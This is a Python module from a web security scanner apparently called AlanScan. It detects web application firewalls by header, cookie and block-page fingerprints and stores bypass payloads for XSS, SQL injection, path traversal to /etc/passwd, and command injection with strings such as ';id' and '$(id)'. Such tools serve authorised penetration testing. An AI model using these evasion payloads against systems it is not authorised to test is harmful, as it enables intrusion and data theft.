"""
scanner/web/waf.py
==================
Smart WAF Detection & Bypass Engine.

What is a WAF?
--------------
A Web Application Firewall (WAF) inspects HTTP requests and blocks those
matching known attack signatures. Common WAFs: Cloudflare, ModSecurity,
AWS WAF, Imperva, Akamai, Sucuri, Barracuda, F5 BIG-IP, Fortinet.

Detection Approach
------------------
1. Passive Detection — Analyse response headers, cookies, and status codes
   from a normal request for WAF-specific fingerprints.
2. Active Probe    — Send a known malicious payload (e.g. <script>alert(1)</script>)
   and check whether the response changes (block page, 403, redirect).
3. Fingerprinting  — Match the block response against WAF-specific signatures
   to identify exactly which WAF is running.

Bypass Techniques
-----------------
Once a WAF is detected, AlanScan switches to evasion payloads:
- Case variation:       <ScRiPt>
- Comment insertion:    <scr/**/ipt>
- URL double-encoding:  %253Cscript%253E
- Null byte insertion:  <scr\x00ipt>
- Unicode escapes:      \u003cscript\u003e
- HTML entity encoding: &#60;script&#62;
- Whitespace variants:  <script  >alert(1)</script  >
- Chunked encoding:     Transfer-Encoding bypass
- HTTP parameter pollution: param=clean&param=payload

OWASP Reference: WSTG-INPV-01, CWE-693
"""

"""
scanner/web/waf.py  v2.0.0
===========================
Enhanced WAF Detection & Bypass Engine with more signatures.
"""

from ..scan_logger import logger
import time

from .base import make_session

# Enhanced WAF signatures
WAF_SIGNATURES = {
    "Cloudflare": {
        "headers": ["cf-ray", "cf-cache-status", "cf-request-id"],
        "cookies": ["__cfduid", "cf_clearance"],
        "body": ["cloudflare", "error 1010", "error 1012", "attention required"],
        "server": ["cloudflare"],
    },
    "ModSecurity": {
        "headers": ["x-mod-security", "mod_security"],
        "cookies": [],
        "body": ["mod_security", "modsecurity", "not acceptable", "406 not acceptable",
                 "request rejected by web application security"],
        "server": ["mod_security", "modsec"],
    },
    "AWS WAF": {
        "headers": ["x-amzn-requestid", "x-amz-cf-id"],
        "cookies": ["aws-waf-token"],
        "body": ["aws waf", "forbidden by aws"],
        "server": [],
    },
    "Imperva (Incapsula)": {
        "headers": ["x-iinfo", "x-cdn"],
        "cookies": ["incap_ses", "visid_incap"],
        "body": ["incapsula", "request unsuccessful", "_incap_"],
        "server": ["incapsula"],
    },
    "Sucuri": {
        "headers": ["x-sucuri-id", "x-sucuri-cache"],
        "cookies": [],
        "body": ["sucuri website firewall", "access denied - sucuri website firewall"],
        "server": ["sucuri"],
    },
    "Akamai": {
        "headers": ["x-akamai-transformed", "akamai-origin-hop"],
        "cookies": ["ak_bmsc", "bm_sz"],
        "body": ["the requested url was rejected", "reference #"],
        "server": ["akamai"],
    },
    "Barracuda": {
        "headers": ["x-barracuda-connect"],
        "cookies": ["barra_counter_session"],
        "body": ["barracuda", "you have been blocked"],
        "server": ["barracuda"],
    },
    "F5 BIG-IP ASM": {
        "headers": ["x-cnection", "x-wa-info"],
        "cookies": ["ts", "tspd_101"],
        "body": ["the requested url was rejected", "your support id is"],
        "server": ["big-ip", "bigip"],
    },
    "Wordfence": {
        "headers": [],
        "cookies": ["wfvt_", "wordfence_verifiedHuman"],
        "body": ["wordfence", "generated by wordfence", "blocked by wordfence"],
        "server": [],
    },
    "Nginx WAF": {
        "headers": [],
        "cookies": [],
        "body": ["nginx/1.", "forbidden", "request denied"],
        "server": ["nginx"],
    },
    "Fastly": {
        "headers": ["x-served-by", "x-cache", "x-cache-hits"],
        "cookies": ["fastly"],
        "body": ["fastly", "varnish"],
        "server": ["fastly", "varnish"],
    },
}

# Enhanced bypass payloads
WAF_BYPASS_PAYLOADS = {
    "xss": [
        "<ScRiPt>alert(1)</ScRiPt>",
        "<scr\x00ipt>alert(1)</scr\x00ipt>",
        "<scr/**/ipt>alert(1)</scr/**/ipt>",
        "%253Cscript%253Ealert(1)%253C%252Fscript%253E",
        "\u003cscript\u003ealert(1)\u003c/script\u003e",
        "&#60;script&#62;alert(1)&#60;/script&#62;",
        "<svg\tonload\t=\talert(1)>",
        "<img src=x onerror\x09=alert(1)>",
        "<details\nopen\nontoggle=alert(1)>",
        "<<script>alert(1)//<</script>",
        "<script>ale\u0072t(1)</script>",
        "<img src=\"x` `\" onerror=alert(1)>",
        "javascript:alert%281%29",
        "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
        "<iframe srcdoc='<svg onload=alert(1)>'></iframe>",
    ],
    "sqli": [
        "' /*!OR*/ '1'='1",
        "'/**/OR/**/1=1--",
        "' %4fR '1'='1",
        "';%00 DROP TABLE--",
        "' OR 1=1 LIMIT 1--+",
        "' OR 1=1#\x00",
        "1' /*!50000OR*/ 1=1--",
        "' OR 'unusual'='unusual",
        "1 OR 1=1/*",
        "' UNION%20SELECT%20NULL--",
        "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
        "' AND 1=CAST(1 AS INT)--",
        "' OR 1=CONVERT(1,CHAR)--",
        "admin' --",
        "admin'#",
        "1' AND '1'='1",
    ],
    "lfi": [
        "....//....//etc/passwd",
        "..%252f..%252fetc%252fpasswd",
        "%2e%2e%2f%2e%2e%2fetc%2fpasswd",
        "..%c0%af..%c0%afetc%c0%afpasswd",
        "..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd",
        "/etc/passwd%00.jpg",
        "....//....//etc/passwd",
        "php://filter/read=convert.base64-encode/resource=index.php",
        "php://filter/convert.base64-encode/resource=../../../../etc/passwd",
        "file:///etc/passwd",
        "file:///C:/Windows/win.ini",
    ],
    "cmdi": [
        ";id",
        "|id",
        "||id",
        "&&id",
        "`id`",
        "$(id)",
        "; whoami",
        "| whoami",
        "& whoami",
        "&& whoami",
        "& ping -c 3 127.0.0.1",
        "; sleep 3",
        "| sleep 3",
        "& timeout /T 3",
    ],
}


class WAFDetector:
    """
    Enhanced WAF detection and bypass engine.
    """

    def __init__(self, url, timeout=10, proxy=None, threads=10):
        self.url = url
        self.timeout = timeout
        self.session = make_session(proxy, timeout)
        self.waf_detected = None
        self.waf_details = {}
        self.findings = []

    def detect(self) -> list[dict]:
        """Run enhanced WAF detection."""
        findings = []

        # Passive detection
        try:
            resp = self.session.get(self.url, timeout=self.timeout,
                                    allow_redirects=True)
            waf = self._fingerprint_response(resp)
            if waf:
                self.waf_detected = waf
                self.waf_details["method"] = "passive"
        except Exception:
            pass

        # Active probe if not detected
        if not self.waf_detected:
            waf = self._active_probe()
            if waf:
                self.waf_detected = waf
                self.waf_details["method"] = "active"

        if self.waf_detected:
            logger.info("  [INFO] WAF Detected: %s", self.waf_detected)
            logger.info("  [*] Switching to WAF bypass payloads")
            findings.append({
                "type": "WAF Detected",
                "url": self.url,
                "parameter": "HTTP headers / response",
                "payload": "WAF probe",
                "severity": "INFO",
                "evidence": (
                    f"WAF identified: {self.waf_detected} (detected via {self.waf_details.get('method', 'unknown')}). "
                    f"AlanScan has automatically switched to WAF bypass payload variants. "
                    f"Bypass techniques include: case mutation, comment insertion, double URL encoding, "
                    f"null bytes, unicode escapes, and protocol-level evasion."
                ),
                "details": {
                    "waf_vendor": self.waf_detected,
                    "detection_method": self.waf_details.get("method", "unknown"),
                    "bypass_categories": sorted(list(WAF_BYPASS_PAYLOADS.keys())),
                }
            })
        else:
            logger.info("  [OK] No WAF detected")
            findings.append({
                "type": "WAF Status — No WAF Detected",
                "url": self.url,
                "parameter": "HTTP response analysis",
                "payload": "N/A",
                "severity": "INFO",
                "evidence": "No WAF fingerprint found in headers, cookies, or response body.",
            })

        return findings

    def get_bypass_payloads(self, category: str) -> list[str]:
        """Return bypass payloads for category."""
        if self.waf_detected:
            return WAF_BYPASS_PAYLOADS.get(category, [])
        return []

    def _fingerprint_response(self, resp) -> str | None:
        """Enhanced fingerprinting with multiple signals."""
        headers_lower = {k.lower(): v.lower() for k, v in resp.headers.items()}
        body_lower = resp.text.lower()[:10000]
        cookies_lower = [c.lower() for c in resp.cookies.keys()]
        server = headers_lower.get("server", "")

        for waf_name, sigs in WAF_SIGNATURES.items():
            # Headers
            for h in sigs["headers"]:
                if h.lower() in headers_lower:
                    return waf_name
            # Cookies
            for c in sigs["cookies"]:
                if any(c.lower() in ck for ck in cookies_lower):
                    return waf_name
            # Body
            for b in sigs["body"]:
                if b.lower() in body_lower:
                    return waf_name
            # Server header
            for s in sigs["server"]:
                if s.lower() in server:
                    return waf_name

        return None

    def _active_probe(self) -> str | None:
        """Enhanced active probe with multiple test payloads."""
        test_payloads = [
            "<script>alert(1)</script>",
            "' OR '1'='1",
            "../../../etc/passwd",
            "<?php echo 'test'; ?>",
        ]

        try:
            baseline = self.session.get(self.url, timeout=self.timeout)
            baseline_len = len(baseline.text)
            baseline_status = baseline.status_code
        except Exception:
            return None

        for payload in test_payloads:
            probe_url = f"{self.url}?probe={payload}"
            try:
                probed = self.session.get(probe_url, timeout=self.timeout,
                                         allow_redirects=False)

                # Block detection
                if probed.status_code in (403, 406, 429, 503):
                    waf = self._fingerprint_response(probed)
                    return waf or "Unknown WAF"

                # Response length significantly different
                if probed.status_code == 200 and baseline_status == 200:
                    if abs(len(probed.text) - baseline_len) > 1000:
                        waf = self._fingerprint_response(probed)
                        return waf or "Unknown WAF"

                # Redirect to block page
                if probed.status_code in (301, 302) and "block" in probed.headers.get("Location", "").lower():
                    return "Unknown WAF (redirect to block page)"

            except Exception:
                continue

        return None